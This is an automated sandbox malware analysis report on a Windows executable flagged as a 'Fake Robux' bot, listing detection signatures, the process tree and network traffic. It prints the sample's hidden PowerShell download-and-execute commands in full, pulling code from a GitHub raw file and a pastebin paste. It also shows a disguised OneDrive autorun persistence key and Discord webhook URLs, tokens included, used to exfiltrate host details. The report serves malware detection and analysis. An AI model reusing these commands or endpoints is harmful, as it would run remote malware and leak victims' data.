Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OSLdZanXNc.exe

Overview

General Information

Sample name:OSLdZanXNc.exe
renamed because original name is a hash value
Original sample name:a40d9f817045b1192d6cfc6a2defd4289d0f8e67c1ad147a7e51d50be8448203.exe
Analysis ID:1534108
MD5:98ff253f6f854df7b7f6794a2761dbd1
SHA1:246ae6060c76a6751b6ba2d9ca0de18e298b5e26
SHA256:a40d9f817045b1192d6cfc6a2defd4289d0f8e67c1ad147a7e51d50be8448203
Tags:exeNeth3Nuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Connects to a pastebin service (likely for C&C)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • OSLdZanXNc.exe (PID: 6820 cmdline: "C:\Users\user\Desktop\OSLdZanXNc.exe" MD5: 98FF253F6F854DF7B7F6794A2761DBD1)
    • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6904 cmdline: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 5692 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 1968 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5724 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6988 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 6908 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4152 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 2132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7056INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x6b4f:$b1: ::WriteAllBytes(
  • 0xf254:$b1: ::WriteAllBytes(
  • 0x2a1bf:$b1: ::WriteAllBytes(
  • 0x927b6:$b1: ::WriteAllBytes(
  • 0x152a36:$b1: ::WriteAllBytes(
  • 0x2143bb:$b1: ::WriteAllBytes(
  • 0x8071d:$s1: -join
  • 0x80757:$s1: -join
  • 0x80862:$s1: -join
  • 0x80b51:$s1: -join
  • 0x80b73:$s1: -join
  • 0x80eb0:$s1: -join
  • 0x80ed0:$s1: -join
  • 0x80f02:$s1: -join
  • 0x80f4a:$s1: -join
  • 0x80f77:$s1: -join
  • 0x80f9e:$s1: -join
  • 0x80fc8:$s1: -join
  • 0x8108b:$s1: -join
  • 0x81538:$s1: -join
  • 0x81559:$s1: -join
Process Memory Space: powershell.exe PID: 6988INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a1c:$b1: ::WriteAllBytes(
  • 0xeb554:$b1: ::WriteAllBytes(
  • 0x93936:$s1: -join
  • 0x9bc8c:$s1: -join
  • 0xd13ac:$s1: -join
  • 0x164a20:$s1: -join
  • 0x1651ba:$s1: -join
  • 0x1605c:$s3: reverse
  • 0x1ffb1:$s3: reverse
  • 0xab752:$s3: reverse
  • 0xb7fa0:$s3: reverse
  • 0x121a7b:$s3: reverse
  • 0x12868a:$s3: reverse
  • 0x12a05d:$s3: reverse
  • 0x1350ae:$s3: reverse
  • 0x1896aa:$s3: reverse
  • 0x189975:$s3: reverse
  • 0x18a045:$s3: reverse
  • 0x18a7fe:$s3: reverse
  • 0x191eff:$s3: reverse
  • 0x192319:$s3: reverse
Process Memory Space: powershell.exe PID: 2132INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xe5a94:$b1: ::WriteAllBytes(
  • 0x11ecf1:$b1: ::WriteAllBytes(
  • 0x139cd1:$b1: ::WriteAllBytes(
  • 0x5ecd9:$s1: -join
  • 0x65d67:$s1: -join
  • 0xa2800:$s1: -join
  • 0xa2f60:$s1: -join
  • 0x3aaa:$s3: reverse
  • 0xdb28:$s3: reverse
  • 0x78a40:$s3: reverse
  • 0x8453a:$s3: reverse
  • 0x1596b2:$s3: reverse
  • 0x1599a0:$s3: reverse
  • 0x15a070:$s3: reverse
  • 0x15a829:$s3: reverse
  • 0x161c0c:$s3: reverse
  • 0x162026:$s3: reverse
  • 0x162bae:$s3: reverse
  • 0x16385b:$s3: reverse
  • 0x16f905:$s3: reverse
  • 0x176542:$s3: reverse
SourceRuleDescriptionAuthorStrings
amsi64_6988.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
amsi64_2132.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 6820, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 6904, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 6820, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 6904, ProcessName: powershell.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7056, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 6820, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 6904, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 6820, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 6904, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 6820, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 6904, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T15:54:46.501030+020028576591A Network Trojan was detected192.168.2.1255624162.159.138.232443TCP
2024-10-15T15:54:53.884821+020028576591A Network Trojan was detected192.168.2.1255625162.159.138.232443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T15:54:30.522779+020028576581A Network Trojan was detected192.168.2.1255611162.159.138.232443TCP

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.12:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.12:55611 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.12:55614 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.12:55617 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.12:55620 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.12:55622 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.12:55624 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.12:55625 version: TLS 1.2
Source: OSLdZanXNc.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2601444821.000002422026F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\adminalt\Autodesk.AutoCAD.2023.x64.Portable\x64\Release\PePacker.pdb source: OSLdZanXNc.exe
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2602749668.0000024220650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2601758086.000002422057E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb& source: powershell.exe, 00000004.00000002.2602273383.00000242205D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.2601063159.00000242201FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000004.00000002.2600442487.00000242201DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbpr source: powershell.exe, 00000004.00000002.2601758086.000002422057E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089" source: powershell.exe, 00000004.00000002.2602273383.000002422061C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbB source: powershell.exe, 00000004.00000002.2602749668.0000024220650000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000002.2601758086.000002422057E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2602668444.0000024220629000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbv source: powershell.exe, 00000004.00000002.2602273383.00000242205D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbw source: powershell.exe, 00000004.00000002.2600442487.00000242201DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb? source: powershell.exe, 00000004.00000002.2600442487.00000242201DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbA59A source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\adminalt\Autodesk.AutoCAD.2023.x64.Portable\x64\Release\PePacker.pdb) source: OSLdZanXNc.exe
Source: Binary string: ws\dll\System.Management.Automation.pdb| source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb[ source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb source: powershell.exe, 00000004.00000002.2602749668.0000024220650000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Source: Network trafficSuricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.12:55611 -> 162.159.138.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.12:55624 -> 162.159.138.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.12:55625 -> 162.159.138.232:443
Source: unknownDNS query: name: pastebin.com
Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 217Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 298Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 298Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: discord.com
